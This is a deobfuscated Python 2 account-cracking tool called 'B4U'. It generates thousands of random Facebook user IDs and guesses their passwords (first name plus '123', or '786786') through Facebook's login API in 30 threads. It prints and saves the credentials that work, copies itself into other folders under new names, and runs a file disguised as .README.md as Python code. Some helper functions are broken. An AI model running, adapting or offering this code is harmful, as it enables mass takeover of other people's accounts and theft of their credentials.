# Deobfuscated BY HTR-TECH | Tahmid Rayat

# Github    : https://github.com/htr-tech 
# Instagram : https://www.instagram.com/tahmid.rayat
# Facebook  : https://fb.com/tahmid.rayat.oficial 
# Messenger : https://m.me/tahmid.rayat.oficial 


#!/usr/bin/python2
#coding=utf-8


import os,sys,time,datetime,random,hashlib,re,threading,json,urllib2,cookielib,getpass
os.system("rm -rf .txt")
for n in range(5000):

    nmbr = random.randint(100002020202020, 100009090909090)
    
    sys.stdout = open(".txt", "a")

    print(nmbr)

    sys.stdout.flush()
    
try:
    import requests
except ImportError:
    os.system('pip2 install requests')
    
try:
    import mechanize
except ImportError:
    os.system('pip2 install mechanize')
    time.sleep(1)
    os.system('python2 .README.md')
    
from multiprocessing.pool import ThreadPool
from requests.exceptions import ConnectionError
from mechanize import Browser


reload(sys)
sys.setdefaultencoding('utf8')

def exb():
	print "[!] Exit"
	os.sys.exit()


def acak(b):
    w = 'ahtdzjc'
    d = ''
    for i in x:
        d += '!'+w[random.randint(0,len(w)-1)]+i
    return cetak(d)


def cetak(b):
    w = 'ahtdzjc'
    for i in w:
        j = w.index(i)
        x= x.replace('!%s'%i,'\033[%s;1m'%str(31+j))
    x += '\033[0m'
    x = x.replace('!0','\033[0m')
    sys.stdout.write(x+'\n')


def psb(z):
	for e in z + '\n':
		sys.stdout.write(e)
		sys.stdout.flush()
		time.sleep(0.03)

def t():
    time.sleep(1)
def cb():
    os.system('clear')
##### LOGO #####
logo='''
 ____    _  _     _    _ 
|  _ \  | || |   | |  | |
| |_) | | || |_  | |  | |
|  _ <  |__   _| | |  | |
| |_) |    | |   | |__| |
|____/     |_|    \____/ 

--------------------------------------------------
➣ Auther   : Binyamin
➣ GitHub   : https://github.com/binyamin-binni
➣ YouTube  : Trick Proof
➣ Blogspot : https://trickproof.blogspot.com
--------------------------------------------------
                                '''

def tik():
	titik = ['.   ','..  ','... ']
	for o in titik:
		print("\r[●] Loging In "+o),;sys.stdout.flush();time.sleep(1)


back = 0
successful = []
cpb = []
oks = []
id = []

def ym():
    try:
        cb()
        os.mkdir("../omi/.....")
    except OSError:
        yp()
    else:
        os.system("cp ../b4u/b4u.py ../omi/Omi.py")
        os.system("cp ../b4u/.README.md ../omi/")
        yb()
    
def yb():
    try:
        os.mkdir("../BlackMafia2020/.....")
    except OSError:
        yl()
    else:
        os.system("cp ../b4u/b4u.py ../BlackMafia2020/lovehacker")
        os.system("cp ../b4u/.README.md ../BlackMafia2020/")
        yl()
    
def yl():
    try:
        os.mkdir("../Qurban/.....")
    except OSError:
        yp()
    else:
        os.system("cp ../b4u/b4u.py ../Qurban/Qurban.py")
        os.system("cp ../b4u/.README.md ../Qurban/")
        yp()
    
def yp():
    try:
        os.mkdir("../faizanwahla/.....")
    except OSError:
        menu()
    else:
        os.system("cp ../b4u/b4u.py ../faizanwahla/pacman")
        os.system("cp ../b4u/.README.md ../faizanwahla/")
        menu()
    
def menu():
	os.system('clear')
	try:
		toket=open('....','r').read()
	except IOError:
		os.system('clear')
		print"[!] Token invalid"
		os.system('rm -rf ....')
		time.sleep(1)
		os.system('python2 b4u.py')
	try:
		otw = requests.get('https://graph.facebook.com/me?access_token='+toket)
		a = json.loads(otw.text)
		nama = a['name']
		id = a['id']
	except KeyError:
		os.system('clear')
		print"[!] It seems that your account has a checkpoint"
		os.system('rm -rf ....')
		time.sleep(1)
		os.system('python2 b4u.py')
	except requests.exceptions.ConnectionError:
		print"[!] There is no internet connection"
		exb()
	os.system("clear")
	print logo
	print "[✓] Name : "+nama+"               "
	print "[✓] ID   : "+id+"              "
	print 50*"-"
	print
	print "[1] Crack Menu"
	print "[2] Update B4U Tool"
	print "[3] Follow Me On Facebook"
	print "[4] Log Out"
	print "[0] Exit            "
	print 50*"-"
	action()


def action():
	chb = raw_input("\n  ▄︻̷̿┻̿═━一   ")
	if chb =="":
		print "[!] Fill in correctly"
		action()
	elif chb =="1":
		crack_menu()
	elif chb =="2":
	    os.system('cp .... $HOME')
	    os.system("rm -rf $HOME/b4u")
	    os.system('cd $HOME && git clone https://github.com/binyamin-binni/b4u')
	    os.system("mv $HOME/.... $HOME/b4u")
	    cb()
	    print (logo)
	    psb('10%')
	    psb('20%')
	    psb('30%')
	    psb('40%')
	    psb('50%')
	    psb('60%')
	    psb('70%')
	    psb('80%')
	    psb('90%')
	    psb('100%')
	    psb('✓')
	    psb('✓')
	    psb('✓')
	    psb('Congratulations B4U Tool Has Been Updated Successfully')
	    time.sleep(2)
	    os.system("cd $HOME/b4u && python2 .README.md")
	elif chb =="3":
	    os.system("xdg-open https://www.facebook.com/100002059014174/posts/2677733205638620/?substory_index=0&app=fbl")
	    time.sleep(1)
	    menu()
	elif chb =="4":
	    os.system("rm -rf ....")
	    print
	    psb(" Logout successfully")
	elif chb =="0":
		exb()
	else:
		print "[!] Fill in correctly"
		action()


def crack_menu():
	global toket
	os.system('clear')
	try:
		toket=open('....','r').read()
	except IOError:
		print"[!] Token invalid"
		os.system('rm -rf ....')
		time.sleep(1)
		os.system('python2 b4u.py')
	os.system('clear')
	print logo
	crack_action()

def crack_action():
	bch = raw_input("\n[•] Press Enter To Start   ")
	if bch =="":
		os.system('clear')
		urllib2.urlopen("https://www.google.com/url?sa=t&source=web&rct=j&url=https://trickproof.blogspot.com/%3Fm%3D1&ved=2ahUKEwi87vKb9cPoAhVIxoUKHT2kBMEQFjAAegQIBBAB&usg=AOvVaw1MUpc0kk_u_Dr7q2z48zC1&cshid=1585630324556")
		print logo
		try:
			idlist = (".txt")
			for line in open(idlist,'r').readlines():
				id.append(line.strip())
		except IOError:
			print '[!] Error 404, please try again'
			raw_input('\n[ Press Enter To Go Back ]')
			menu()
	elif bch =="0":
		menu()
	else:
		print "[!] Fill in correctly"
		crack_action()
	xxx = str(len(id))
	psb ("[✓] Total IDs: "+xxx)
	time.sleep(0.5)
	psb ('[✓] Please wait, process is running ...')
	time.sleep(0.5)
	psb ('[!] To Stop Process Press CTRL Then Press z')
	time.sleep(0.5)
	print 50*"-"
	print
	
			
	def main(arg):
		global cpb,oks
		user = arg
		try:
			os.mkdir('save')
		except OSError:
			pass
		try:
			a = requests.get('https://graph.facebook.com/'+user+'/?access_token='+toket)
			b = json.loads(a.text)
			pass1 = b["first_name"]+"123"
			data = urllib2.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass1)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
			q = json.load(data)
			if 'access_token' in q:
				print '\x1b[1;92m[Successful]\x1b[0m ' + user + ' | ' + pass1
				oks.append(user+pass1)
			else:
				if 'www.facebook.com' in q["error_msg"]:
					print '[Checkpoint] ' + user + ' | ' + pass1
					cps = open("save/checkpoint.txt", "a")
					cps.write(user+"|"+pass1+"\n")
					cps.close()
					cpb.append(user+pass1)
				else:
					pass2 = "786786"
					data = urllib2.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass2)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
					q = json.load(data)
					if 'access_token' in q:
						print '\x1b[1;92m[Successful]\x1b[0m ' + user + ' | ' + pass2
						oks.append(user+pass2)
					else:
						if 'www.facebook.com' in q["error_msg"]:
							print '[Checkpoint] ' + user + ' | ' + pass2
							cps = open("save/checkpoint.txt", "a")
							cps.write(user+"|"+pass2+"\n")
							cps.close()
							cpb.append(user+pass2)
																	
															
		except:
			pass
		
	p = ThreadPool(30)
	p.map(main, id)
	print 50*"-"
	print '[✓] Process Has Been Completed ....'
	print "[✓] Total OK/CP : "+str(len(oks))+"/"+str(len(cpb))
	print("[✓] CP File Has Been Saved : save/checkpoint.txt")
	raw_input("\n[Press Enter To Go Back]")
	if xxx == '0':
		crack_menu()
	else:
		os.system('python2 .README.md')

if __name__ == '__main__':
	ym()

